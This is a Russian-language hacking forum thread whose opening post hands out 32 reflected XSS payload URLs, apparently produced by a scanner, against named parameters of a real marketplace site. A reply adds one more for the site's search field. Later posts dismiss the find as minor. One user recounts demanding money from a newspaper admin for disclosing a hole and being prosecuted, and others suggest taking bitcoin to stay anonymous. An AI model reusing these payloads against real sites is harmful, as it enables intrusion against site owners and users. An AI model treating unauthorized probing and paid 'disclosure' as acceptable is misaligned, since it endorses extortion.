Нашел уязвимый сайт, отдаю.

Уязвимости:
| XSS:
| [+] Vul[1] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><script>alert('XSS')</script>
| [+] Vul[2] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">'';!--"<XSS>=&{()}
| [+] Vul[3] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><IMG SRC="javascript:alert('XSS');">
| [+] Vul[4] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul[5] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul[6] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul[7] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><body onload="javascript:alert('XSS')"></body>
| [+] Vul[8] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><table background="javascript:alert('XSS')"></table>
| [+] Vul[9] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><script>alert('XSS')</script>
| [+] Vul[10] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">'';!--"<XSS>=&{()}
| [+] Vul[11] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><IMG SRC="javascript:alert('XSS');">
| [+] Vul[12] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul[13] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul[14] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul[15] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><body onload="javascript:alert('XSS')"></body>
| [+] Vul[16] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><table background="javascript:alert('XSS')"></table>
| [+] Vul[17] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><script>alert('XSS')</script>
| [+] Vul[18] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">'';!--"<XSS>=&{()}
| [+] Vul[19] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><IMG SRC="javascript:alert('XSS');">
| [+] Vul[20] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul[21] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul[22] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul[23] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><body onload="javascript:alert('XSS')"></body>
| [+] Vul[24] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><table background="javascript:alert('XSS')"></table>
| [+] Vul[25] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><script>alert('XSS')</script>
| [+] Vul[26] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">'';!--"<XSS>=&{()}
| [+] Vul[27] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><IMG SRC="javascript:alert('XSS');">
| [+] Vul[28] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul[29] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul[30] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul[31] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><body onload="javascript:alert('XSS')"></body>
| [+] Vul[32] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><table background="javascript:alert('XSS')"></table>

 

да там и в поиске такая же хуйня и скорее всего вообще в любом поле
http://mirtesen.ru/market/search?search="><script>alert('pwn')</script>

 

Хрень, нечего интересного!!!!! Постоянно перекидывает на search

 

И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки

 

при том найденные сканером

 

полная шляпа, перекидывает на search

 

Меня так чуть не посадили за взлом сайта городской газеты с активной хсс

 

Анонимности тебе не занимать)))

 

Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).

Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.

Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.

 

Админ пидаром оказало, краснопузый мудозвон...

 

Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.


вебмани в 2к17

 

А кто тебе сказал, что это было в 2к17? Тогда биткоинов ещё небыло.

Это не вымогательство. Вымогательство — это если бы я блокировал сайт через такую дырку и просил деньги за разблокировку. А ведь такая возможность была.